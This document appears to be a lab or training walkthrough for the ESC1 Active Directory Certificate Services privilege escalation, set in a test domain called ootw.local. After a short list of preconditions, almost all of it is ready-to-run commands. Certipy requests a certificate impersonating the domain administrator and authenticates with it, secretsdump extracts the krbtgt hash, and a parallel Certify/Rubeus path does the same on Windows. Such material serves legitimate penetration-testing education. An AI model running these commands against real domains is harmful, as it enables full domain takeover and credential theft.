ESC1 abuses a template where the enrollee can supply the subject and the resulting certificate is valid for client authentication. We request a certificate that maps to a privileged user, then authenticate with that certificate.
Conditions
Template is enabled on a CA.
Requester has enrollment rights.
Enrollee Supplies Subject is enabled.
Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or equivalent authentication EKU is present.
Manager approval is not required.
Authorized signatures required is 0.
Find ESC1
certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout
Get target SID
certipy account -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -user administrator read
Request certificate as Administrator
certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC1 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator
Authenticate with certificate
certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist
Use the ticket
nxc smb 10.10.10.200 -d ootw.local -u administrator -k --use-kcache
secretsdump.py -k -no-pass ootw.local/administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc-user krbtgt
Windows with Certify
Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC1 --upn Administrator --quiet
$CertB64 = "CERT_B64"
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$CertB64 /enctype:aes256 /ptt
klist
Notes
Use -sid when possible. Modern certificate mapping behavior can reject weak mappings where only the UPN is supplied. The SID extension makes the certificate map to the intended account more reliably in patched environments.